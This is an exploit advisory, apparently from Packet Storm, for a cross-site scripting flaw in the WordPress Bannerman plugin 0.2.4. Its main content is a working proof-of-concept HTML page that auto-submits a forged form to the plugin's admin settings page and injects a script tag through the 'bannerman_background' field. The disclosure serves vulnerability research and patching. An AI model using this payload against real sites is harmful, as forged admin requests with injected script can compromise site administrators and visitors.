Wordpress Bannerman plugin version 0.2.4 suffers from a cross site scripting vulnerability.
bf0c15829a7d36b2a5e96affd7487c23503c5a385af93312ea99b95382b97ddd######################
# Exploit Title : Wordpress bannerman.0.2.4 Cross Site Scripting
# Exploit Author : Ashiyane Digital Security Team
# Vendor Homepage : http://wordpress.org/plugins/bannerman/
# Software Link : http://downloads.wordpress.org/plugin/bannerman.0.2.4.zip
# Date : 2014-06-27
# Tested on : Windows 7 / Mozilla Firefox
######################
# Location : http://localhost/wp-admin/options-general.php?page=bannerman
######################
Exploit Code:
<html>
<body>
<form name="post_form"
action="http://localhost/wp-admin/options-general.php?page=bannerman"
method="post">
<input type='hidden' name="bannerman_background"
id="bannerman_background" value='"/><script>alert(1);</script>'/>
<script language="Javascript">
setTimeout('post_form.submit()', 1);
</script>
</form>
</body>
</html>
#####################
Discovered By : ACC3SS
#####################
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed